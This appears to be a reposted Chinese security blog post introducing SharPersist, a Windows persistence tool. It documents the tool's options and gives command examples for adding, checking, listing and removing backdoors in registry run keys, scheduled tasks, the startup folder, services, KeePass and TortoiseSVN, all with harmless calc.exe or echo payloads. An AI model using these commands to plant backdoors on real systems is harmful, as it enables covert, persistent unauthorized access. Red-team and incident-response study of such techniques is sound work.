SharPersist:windows 系统权限维持的工具

admin

140350
文章

117
评论

2024年4月22日06:07:35评论36 views字数 3538阅读11分47秒阅读模式

工具介绍

sharPersist 是一款用于windows 系统权限维持的工具，支持部署注册表、任务计划、启动文件夹、window 服务等后门进行权限维持。还可以用于应急响应，对各种后门进行排查，删除。

工具使用

命令详情参数详情●-t - 持久性技术●-c - 要执行的命令●-a - 要执行的命令的参数（如果适用）●-f - 要创建/修改的文件●-k - 要创建/修改的注册表项●-v - 要创建/修改的注册表值●-n - 计划任务名称或服务名称●-m - 方法（添加、删除、检查、列表）●-o - 可选附加组件●-h - 帮助页面持久化技术（-t）●keepass- 后门keepass配置文件●reg- 注册表项添加/修改●schtaskbackdoor- 通过向其添加附加操作来后门计划任务●startupfolder- 启动文件夹中的lnk文件●tortoisesvn- 乌龟svn钩子脚本●service- 创建新的Windows服务●schtask- 创建新的计划任务方法（-m）●add- 添加持久性技术●remove- 删除持久性技术●check- 进行持久性技术的演练●list- 列出持久性技术的当前条目可选附加组件（-o）●env- 用于注册表环境变量混淆的可选附加组件●hourly- schtask 频率的可选附加组件●daily- schtask 频率的可选附加组件●logon- schtask 频率的可选附加组件注册表项（-k）●hklmrun●hklmrunonce●hklmrunonceex●hkcurun●hkcurunonce●logonscript●stickynotes●userinit

使用示例

添加持久性触发器（Add）凯通SharPersist -t keepass -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -f "C:UsersusernameAppDataRoamingKeePassKeePass.config.xml" -m add 登记处SharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m addSharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o envSharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -k "logonscript" -m add计划任务后门SharPersist -t schtaskbackdoor -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add启动文件夹SharPersist -t startupfolder -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -f "Some File" -m add乌龟SVNSharPersist -t tortoisesvn -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -m add视窗服务SharPersist -t service -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -n "Some Service" -m add计划任务SharPersist -t schtask -c "C:WindowsSystem32cmd.exe" -a "/c echo 123 >> c:123.txt" -n "Some Task" -m addSharPersist -t schtask -c "C:WindowsSystem32cmd.exe" -a "/c echo 123 >> c:123.txt" -n "Some Task" -m add -o hourly

删除持久性触发器（删除）凯通SharPersist -t keepass -f "C:UsersusernameAppDataRoamingKeePassKeePass.config.xml" -m remove登记处SharPersist -t reg -k "hkcurun" -v "Test Stuff" -m removeSharPersist -t reg -k "hkcurun" -v "Test Stuff" -m remove -o envSharPersist -t reg -k "logonscript" -m remove计划任务后门SharPersist -t schtaskbackdoor -n "Something Cool" -m remove启动文件夹SharPersist -t startupfolder -f "Some File" -m remove乌龟SVNSharPersist -t tortoisesvn -m remove视窗服务SharPersist -t service -n "Some Service" -m remove计划任务SharPersist -t schtask -n "Some Task" -m remove

执行持久性触发器的试运行（检查）凯通SharPersist -t keepass -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -f "C:UsersusernameAppDataRoamingKeePassKeePass.config.xml" -m check登记处SharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m checkSharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m check -o envSharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -k "logonscript" -m check计划任务后门SharPersist -t schtaskbackdoor -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -n "Something Cool" -m check启动文件夹SharPersist -t startupfolder -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -f "Some File" -m check乌龟SVNSharPersist -t tortoisesvn -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -m check视窗服务SharPersist -t service -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -n "Some Service" -m check计划任务SharPersist -t schtask -c "C:WindowsSystem32cmd.exe" -a "/c echo 123 >> c:123.txt" -n "Some Task" -m checkSharPersist -t schtask -c "C:WindowsSystem32cmd.exe" -a "/c echo 123 >> c:123.txt" -n "Some Task" -m check -o hourly

列出持久性触发器条目（List）登记处SharPersist -t reg -k "hkcurun" -m list计划任务后门SharPersist -t schtaskbackdoor -m listSharPersist -t schtaskbackdoor -m list -n "Some Task"SharPersist -t schtaskbackdoor -m list -o logon启动文件夹SharPersist -t startupfolder -m list视窗服务SharPersist -t service -m listSharPersist -t service -m list -n "Some Service"计划任务SharPersist -t schtask -m listSharPersist -t schtask -m list -n "Some Task"SharPersist -t schtask -m list -o logo

下载链接

https://github.com/mandiant/SharPersist

原文始发于微信公众号（贝雷帽SEC）：【红队】一款用于windows 系统权限维持的工具

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

SharPersist:windows 系统权限维持的工具

Windows下完整NMAP源码编译指南

Nmap 7.96 发布，改进DNS解析速度

CAI：当前效果最好的开源AI辅助渗透测试工具

KoviD：红队 Linux 内核 rootkit

Burpsuite安装指南

Memtodesk: 获取todesk密码与解除锁屏工具

MQTT未授权访问及检测工具

红队必备神器！Invicti 25.5 更新下载

【代码审计工具】PHPAuthScanner V1.0发布

漏洞扫描工具 ThinkPHPKiller

发表评论

在线咨询

微信